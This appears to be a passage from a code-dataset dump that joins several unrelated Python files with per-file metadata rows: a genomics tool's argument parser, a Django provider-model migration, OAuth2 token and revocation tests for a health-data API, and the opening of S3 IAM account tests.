sys.argv[outputIdx] = sys.argv[outputIdx].replace("-", ":")
except:
pass
# distinguish the '-' in the pileup path from the '-' used for argument flags
try:
pileupIdx = sys.argv.index("--pileup")
pileupIdx+=1
sys.argv[pileupIdx] = sys.argv[pileupIdx].replace("-", ":")
except:
try:
pileupIdx = sys.argv.index("-p")
pileupIdx+=1
sys.argv[pileupIdx] = sys.argv[pileupIdx].replace("-", ":")
except:
pass
### verify that no arguments are empty
params_in_config = ['input', 'bed', 'fasta', 'min_base_quality', 'min_read_quality', 'min_mapping_quality', 'min_variant_umi', 'strand_bias_method', 'max_strand_bias', 'output', 'pileup', 'cores', 'alpha', 'max_hp_length', 'gvcf', 'keep_pileup']
params_mini = ['i', 'b', 'f', 'x', 'x', 'x', 'x', 'x', 'x', 'o', 'p', 'c', 'x', 'x', 'x', 'x']
params = ['--input | -i', '--bed | -b', '--fasta | -f', '--min_base_quality', '--min_read_quality', '--min_mapping_quality', '--min_variant_umi', '--strand_bias_method', '--max_strand_bias', '--output | -o', '--pileup | -p', '--cores | -c', '--alpha' , '--max_hp_length', '--gvcf', '--keep_pileup']
pointer = 1
while pointer < len(sys.argv):
param = sys.argv[pointer]
try:
value = sys.argv[pointer+1]
except:
if "--" in param:
if param in ['--input', '--bed', '--fasta']:
PrintTime('error', "\tThe parameter "+params[params_in_config.index(param.replace("--", ""))]+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
else:
if param.replace("--", "") in params_in_config:
PrintTime('error', "\tThe parameter's "+params[params_in_config.index(param.replace("--", ""))]+" value cannot be empty !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
elif "-" in param and "--" not in param:
if param in ['-i', '-b', '-f']:
PrintTime('error', "\tThe parameter "+params[params_mini.index(param.replace("-", ""))]+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
else:
if param.replace("-", "") in params_mini:
PrintTime('error', "\tThe parameter's "+params[params_mini.index(param.replace("-", ""))]+" value cannot be empty !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
if "-" in value and len(value) == 2:
PrintTime('error', "\tThe parameter "+param+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
if "--" in value and len(value) > 3:
PrintTime('error', "\tThe parameter "+param+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
pointer += 2
args=""
for arg in sys.argv:
args+=" "+arg
args = args.replace("--", "|")
args = args.replace("-", "|")
args = args.split("|")
del args[0]
sb_set = False
for arg in args:
param = arg.split(" ")[0]
value = arg.split(" ")[1]
if param == "input" or param == "i":
param = "input"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "fasta" or param == "f":
param = "fasta"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "bed" or param == "b":
param = "bed"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "pileup" or param == "p":
param = "pileup"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "output" or param == "o":
param = "output"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "cores" or param == "c":
param = "cores"
try:
config[param]=int(value)
config["default_cores"] = False
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be an integer !\n\t\t\tExiting...")
exit()
if param == "min_base_quality":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "min_read_quality":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "min_mapping_quality":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "min_variant_umi":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "strand_bias_method":
value = str(value).replace("'", '').replace('"', "")
try:
test = value.index('default')
config[param]=value
except:
try:
test = value.index('torrent_suite')
config[param]=value
except:
PrintTime('error', "\tThe parameter --"+param+" can only be set to \"default\" or \"torrent_suite\" !\n\t\t\tExiting...")
exit()
if param == "max_strand_bias":
try:
config[param]=float(value)
sb_set = True
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "alpha":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "max_hp_length":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "gvcf":
value = value.lower()
if value in ['true', 'false']:
value = True if value == 'true' else False
config[param]=value
else:
PrintTime('error', "\tThe parameter's --"+param+" value should be a boolean (True/False) !\n\t\t\tExiting...")
exit()
if param == "keep_pileup":
value = value.lower()
if value in ['true', 'false']:
value = True if value == 'true' else False
config[param]=value
else:
PrintTime('error', "\tThe parameter's --"+param+" value should be a boolean (True/False) !\n\t\t\tExiting...")
exit()
if not sb_set:
if config["strand_bias_method"] == "default":
config["max_strand_bias"] = 1.0
else:
config["max_strand_bias"] = 0.743
return config
else:
PrintTime('error', "\tPlease specify the tool you want to use first!\n\t\t\tExiting...")
exit()
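# A hedged usage sketch (an illustrative addition, not part of the original
# module): Config() reads sys.argv directly, so an entry-point script would
# use it roughly like this (paths and values are made up):
#
#   import sys
#   sys.argv = ['umi_varcal.py', 'extract', '--input', 'sample.bam',
#               '--fasta', 'ref.fa', '--umi_length', '12']
#   config = Config()
#   # config -> {'bwa_threads': 1, 'umi_length': 12,
#   #            'input': '/abs/path/sample.bam', 'fasta': '/abs/path/ref.fa'}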
| 25.558974
| 300
| 0.575508
| 1,920
| 14,952
| 4.427604
| 0.093229
| 0.053523
| 0.011999
| 0.043995
| 0.807317
| 0.769557
| 0.752147
| 0.739325
| 0.736031
| 0.736031
| 0
| 0.005455
| 0.227528
| 14,952
| 584
| 301
| 25.60274
| 0.730563
| 0.082865
| 0
| 0.779793
| 0
| 0
| 0.283821
| 0.003294
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002591
| false
| 0.018135
| 0.012953
| 0
| 0.020725
| 0.002591
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54d84dc10f8feff7b69afdf71625c7e783b6f4ec
| 3,562
|
py
|
Python
|
apps/provider/migrations/0001_initial.py
|
videntity/hhs_oauth_client
|
f66596082d76a0eed20143d30c241d489c06bcf3
|
[
"Apache-2.0"
] | 2
|
2016-08-03T16:33:20.000Z
|
2021-01-27T09:39:40.000Z
|
apps/provider/migrations/0001_initial.py
|
HHSIDEAlab/hhs_oauth_client
|
f66596082d76a0eed20143d30c241d489c06bcf3
|
[
"Apache-2.0"
] | null | null | null |
apps/provider/migrations/0001_initial.py
|
HHSIDEAlab/hhs_oauth_client
|
f66596082d76a0eed20143d30c241d489c06bcf3
|
[
"Apache-2.0"
] | 3
|
2016-06-08T14:36:24.000Z
|
2017-05-15T16:17:05.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('fhir_json_snipit', models.TextField(default='', max_length=2000)),
],
),
migrations.CreateModel(
name='Affiliation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('fhir_json_snipit', models.TextField(default='', max_length=2000)),
],
),
migrations.CreateModel(
name='License',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('fhir_json_snipit', models.TextField(default='', max_length=2000)),
],
),
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('npi', models.CharField(default='', max_length=10)),
('fhir_id', models.CharField(default='', max_length=24)),
('organization_name', models.CharField(default='', max_length=256)),
('doing_business_as', models.CharField(default='', max_length=256)),
('addresses', models.ForeignKey(blank=True, to='provider.Address', null=True)),
('affiliations', models.ForeignKey(blank=True, to='provider.Affiliation', null=True)),
('licenses', models.ForeignKey(blank=True, to='provider.License', null=True)),
],
),
migrations.CreateModel(
name='Practitioner',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('npi', models.CharField(default='', max_length=10)),
('fhir_id', models.CharField(default='', max_length=24)),
('first_name', models.CharField(default='', max_length=256)),
('last_name', models.CharField(default='', max_length=256)),
('doing_business_as', models.CharField(default='', max_length=256)),
('addresses', models.ForeignKey(blank=True, to='provider.Address', null=True)),
('affiliations', models.ForeignKey(blank=True, to='provider.Affiliation', null=True)),
('licenses', models.ForeignKey(blank=True, to='provider.License', null=True)),
],
),
migrations.CreateModel(
name='Taxonomy',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('fhir_json_snipit', models.TextField(default='', max_length=2000)),
],
),
migrations.AddField(
model_name='practitioner',
name='taxonomies',
field=models.ForeignKey(blank=True, to='provider.Taxonomy', null=True),
),
migrations.AddField(
model_name='organization',
name='taxonomies',
field=models.ForeignKey(blank=True, to='provider.Taxonomy', null=True),
),
]
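# For orientation (an illustrative reconstruction, not part of this
# migration): the 'Organization' CreateModel plus the AddField above
# correspond roughly to a model declared as follows (module path assumed):
#
# class Organization(models.Model):
#     npi = models.CharField(default='', max_length=10)
#     fhir_id = models.CharField(default='', max_length=24)
#     organization_name = models.CharField(default='', max_length=256)
#     doing_business_as = models.CharField(default='', max_length=256)
#     addresses = models.ForeignKey('Address', blank=True, null=True)
#     affiliations = models.ForeignKey('Affiliation', blank=True, null=True)
#     licenses = models.ForeignKey('License', blank=True, null=True)
#     taxonomies = models.ForeignKey('Taxonomy', blank=True, null=True)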
| 45.088608
| 114
| 0.569624
| 336
| 3,562
| 5.875
| 0.193452
| 0.065856
| 0.10537
| 0.113982
| 0.847518
| 0.847518
| 0.847518
| 0.828267
| 0.828267
| 0.828267
| 0
| 0.015601
| 0.28018
| 3,562
| 78
| 115
| 45.666667
| 0.75429
| 0.005896
| 0
| 0.75
| 0
| 0
| 0.134219
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027778
| 0
| 0.069444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0766b3ef04aa74b82c4eede4edfebd339a596183
| 17,086
|
py
|
Python
|
apps/dot_ext/tests/test_authorization.py
|
johnfrenchxyz/bluebutton-web-server
|
27adc139ddd511cc8d3e601726fa93eda89133fd
|
[
"Apache-2.0"
] | null | null | null |
apps/dot_ext/tests/test_authorization.py
|
johnfrenchxyz/bluebutton-web-server
|
27adc139ddd511cc8d3e601726fa93eda89133fd
|
[
"Apache-2.0"
] | null | null | null |
apps/dot_ext/tests/test_authorization.py
|
johnfrenchxyz/bluebutton-web-server
|
27adc139ddd511cc8d3e601726fa93eda89133fd
|
[
"Apache-2.0"
] | null | null | null |
from oauth2_provider.compat import parse_qs, urlparse
from oauth2_provider.models import get_access_token_model, get_refresh_token_model
from django.urls import reverse
from django.test import Client
from apps.test import BaseApiTest
from ..models import Application, ArchivedToken
from apps.authorization.models import DataAccessGrant, ArchivedDataAccessGrant
AccessToken = get_access_token_model()
RefreshToken = get_refresh_token_model()
class TestAuthorizeWithCustomScheme(BaseApiTest):
def test_post_with_valid_non_standard_scheme(self):
redirect_uri = 'com.custom.bluebutton://example.it'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
code_challenge = "sZrievZsrYqxdnu2NVD603EiYBM18CuzZpwB-pOSZjo"
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'code_challenge': code_challenge,
'code_challenge_method': 'S256',
}
response = self.client.get('/v1/o/authorize', data=payload)
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
'code_challenge': code_challenge,
'code_challenge_method': 'S256',
}
response = self.client.post(response['Location'], data=payload)
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'code_verifier': 'test123456789123456789123456789123456789123456789',
}
response = self.client.post(reverse('oauth2_provider:token'), data=token_request_data)
self.assertEqual(response.status_code, 200)
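# An illustrative aside (not part of the original tests): with PKCE's S256
# method, the code_challenge sent above is the unpadded base64url encoding of
# the SHA-256 digest of the code_verifier; the hardcoded pair in this test is
# assumed to have been generated the same way.
import base64
import hashlib
def _s256_challenge(code_verifier):
    # RFC 7636: BASE64URL-ENCODE(SHA256(ASCII(code_verifier))), no '=' padding
    digest = hashlib.sha256(code_verifier.encode('ascii')).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b'=').decode('ascii')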
def test_post_with_invalid_non_standard_scheme(self):
redirect_uri = 'com.custom.bluebutton://example.it'
bad_redirect_uri = 'com.custom.bad://example.it'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': bad_redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.assertEqual(response.status_code, 400)
def test_refresh_token(self):
redirect_uri = 'http://localhost'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
refresh_tkn = response.json()['refresh_token']
refresh_request_data = {
'grant_type': 'refresh_token',
'refresh_token': refresh_tkn,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
response = self.client.post(reverse('oauth2_provider:token'), data=refresh_request_data)
self.assertEqual(response.status_code, 200)
self.assertNotEqual(response.json()['access_token'], tkn)
def test_refresh_with_expired_token(self):
redirect_uri = 'http://localhost'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
refresh_tkn = response.json()['refresh_token']
at = AccessToken.objects.get(token=tkn)
at.delete()
refresh_request_data = {
'grant_type': 'refresh_token',
'refresh_token': refresh_tkn,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
response = self.client.post(reverse('oauth2_provider:token'), data=refresh_request_data)
self.assertEqual(response.status_code, 401)
def test_refresh_with_revoked_token(self):
redirect_uri = 'http://localhost'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
revoke_request_data = {
'token': tkn,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
rev_response = c.post('/v1/o/revoke_token/', data=revoke_request_data)
self.assertEqual(rev_response.status_code, 200)
archived_token = ArchivedToken.objects.get(token=tkn)
self.assertEqual(application.id, archived_token.application.id)
self.assertEqual(tkn, archived_token.token)
refresh_tkn = response.json()['refresh_token']
refresh_request_data = {
'grant_type': 'refresh_token',
'refresh_token': refresh_tkn,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
response = self.client.post(reverse('oauth2_provider:token'), data=refresh_request_data)
self.assertEqual(response.status_code, 401)
self.assertEqual(response.content, b'{"error": "invalid_grant"}')
def test_application_delete_after_auth(self):
# Test that there are no errors with cascading deletes
redirect_uri = 'http://localhost'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
refresh_tkn = response.json()['refresh_token']
# Test for cascading constraint errors.
application_pk = application.pk
application.delete()
# Test related objects are deleted
self.assertFalse(AccessToken.objects.filter(token=tkn).exists())
self.assertTrue(ArchivedToken.objects.filter(token=tkn).exists())
self.assertFalse(RefreshToken.objects.filter(token=refresh_tkn).exists())
self.assertFalse(DataAccessGrant.objects.filter(application__pk=application_pk).exists())
self.assertTrue(ArchivedDataAccessGrant.objects.filter(application__pk=application_pk).exists())
def test_user_delete_after_auth(self):
# Test that there are no errors with cascading deletes
redirect_uri = 'http://localhost'
# create a user
user = self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
refresh_tkn = response.json()['refresh_token']
# Test for cascading constraint errors.
user_pk = user.pk
user.delete()
# Test related objects are deleted
self.assertFalse(AccessToken.objects.filter(token=tkn).exists())
self.assertTrue(ArchivedToken.objects.filter(token=tkn).exists())
self.assertFalse(RefreshToken.objects.filter(token=refresh_tkn).exists())
self.assertFalse(DataAccessGrant.objects.filter(beneficiary__pk=user_pk).exists())
self.assertTrue(ArchivedDataAccessGrant.objects.filter(beneficiary__pk=user_pk).exists())
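# The tests above repeat the same authorize -> token dance; a condensed helper
# capturing that flow could look like this (an illustrative sketch under the
# same fixtures, not part of the original file).
def _get_tokens(test_case, application, redirect_uri):
    payload = {
        'client_id': application.client_id,
        'response_type': 'code',
        'redirect_uri': redirect_uri,
        'scope': ['capability-a'],
        'expires_in': 86400,
        'allow': True,
    }
    response = test_case.client.post(reverse('oauth2_provider:authorize'), data=payload)
    test_case.client.logout()
    # Extract the authorization code from the redirect and trade it for tokens.
    code = parse_qs(urlparse(response['Location']).query).pop('code')
    token_response = Client().post('/v1/o/token/', data={
        'grant_type': 'authorization_code',
        'code': code,
        'redirect_uri': redirect_uri,
        'client_id': application.client_id,
        'client_secret': application.client_secret,
    })
    return token_response.json()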
| 45.201058
| 104
| 0.641285
| 1,839
| 17,086
| 5.706362
| 0.079935
| 0.051363
| 0.03259
| 0.042882
| 0.889937
| 0.888412
| 0.888412
| 0.864208
| 0.863922
| 0.859825
| 0
| 0.019337
| 0.255414
| 17,086
| 377
| 105
| 45.320955
| 0.805534
| 0.103125
| 0
| 0.8
| 0
| 0
| 0.158856
| 0.030305
| 0
| 0
| 0
| 0
| 0.098413
| 1
| 0.022222
| false
| 0.022222
| 0.022222
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ade0862fe46404d1a8e0bef326516302d489d02
| 114,235
|
py
|
Python
|
st/clitests/auth_spec.py
|
sanalpk/cortx-s3server
|
62b2b7d04111efceae9cbed333d690b8c1162ac8
|
[
"Apache-2.0"
] | 35
|
2020-09-25T07:27:10.000Z
|
2022-03-23T07:49:57.000Z
|
st/clitests/auth_spec.py
|
sanalpk/cortx-s3server
|
62b2b7d04111efceae9cbed333d690b8c1162ac8
|
[
"Apache-2.0"
] | 1,000
|
2020-09-24T13:10:23.000Z
|
2022-03-28T08:19:34.000Z
|
st/clitests/auth_spec.py
|
sanalpk/cortx-s3server
|
62b2b7d04111efceae9cbed333d690b8c1162ac8
|
[
"Apache-2.0"
] | 150
|
2020-09-24T14:41:40.000Z
|
2022-03-04T05:37:17.000Z
|
#
# Copyright (c) 2020 Seagate Technology LLC and/or its Affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email opensource@seagate.com or cortx-questions@seagate.com.
#
import os
import sys
import yaml
import time
from ldap_setup import LdapInfo
from framework import Config
from framework import S3PyCliTest
from auth import AuthTest
from s3client_config import S3ClientConfig
from s3cmd import S3cmdTest
from s3fi import S3fiTest
from awss3api import AwsTest
from shutil import copyfile
import shutil
from s3confstore.cortx_s3_confstore import S3CortxConfStore
home_dir = os.path.expanduser("~")
original_config_file = os.path.join(home_dir, '.sgs3iamcli/config.yaml')
backup_config_file = os.path.join(home_dir, '.sgs3iamcli/backup_config.yaml')
# Helps debugging
# Config.log_enabled = True
# Config.dummy_run = True
# Set time_readable_format to False if you want to display the time in milliseconds.
# Config.time_readable_format = False
# global params required for the suite
def update_config_yaml(new_config_entries):
shutil.copy2(original_config_file, backup_config_file)
with open(original_config_file, 'r') as f:
cur_yaml = yaml.safe_load(f)  # safe_load avoids constructing arbitrary objects
cur_yaml.update(new_config_entries)
with open(original_config_file, 'w') as f:
yaml.dump(cur_yaml, f, default_flow_style = False)
def restore_config_yaml():
# Restore original ~/.sgs3iamcli/config.yaml file
shutil.copy2(backup_config_file, original_config_file)
class GlobalTestState:
root_access_key = ""
root_secret_key = ""
# Extract the response elements from response which has the following format
# <Key 1> = <Value 1>, <Key 2> = <Value 2> ... <Key n> = <Value n>
def get_response_elements(response):
response_elements = {}
key_pairs = response.split(',')
for key_pair in key_pairs:
tokens = key_pair.split('=')
response_elements[tokens[0].strip()] = tokens[1].strip()
return response_elements
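# Illustrative usage of the parser above (an addition, not in the original
# script), matching the documented "<Key> = <Value>" format:
_example = get_response_elements("AccountId = 1234, CanonicalId = abcd")
assert _example == {'AccountId': '1234', 'CanonicalId': 'abcd'}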
# Load test config file
def load_test_config():
conf_file = os.path.join(os.path.dirname(__file__),'s3iamcli_test_config.yaml')
with open(conf_file, 'r') as f:
config = yaml.safe_load(f)
S3ClientConfig.ldapuser = config['ldapuser']
S3ClientConfig.ldappasswd = config['ldappasswd']
# Run before all tests to set up the test environment.
def before_all():
load_test_config()
print("Configuring LDAP")
S3PyCliTest('Before_all').before_all()
# Set S3ClientConfig with root credentials
def _use_root_credentials():
S3ClientConfig.access_key_id = GlobalTestState.root_access_key
S3ClientConfig.secret_key = GlobalTestState.root_secret_key
# Test create account API
def account_tests():
# Test Create Account with keys
# 1. Positive
test_msg = "Create account s3testwithkeys1 with Access key and Secret key"
account_args = {
'AccountName': 's3testwithkeys1',
'Email': 's3testwithkeys1@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'access_key': 'AAAAAAAAAAAAAAAAA1',
'secret_key': 'SSSSSSSSS1'
}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
AuthTest("Test passed. Deleting account.").delete_account(**account_args).execute_test()
# 2. Negative
test_msg = "Create account s3testwithkeys2 with only Access key"
account_args = {
'AccountName': 's3testwithkeys2',
'Email': 's3testwithkeys2@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'access_key': 'AAAAAAAAAAAAAAAAA2'
}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidParameterValue")
# 3. Negative
test_msg = "Create account s3testwithkeys3 with only Secret key"
account_args = {
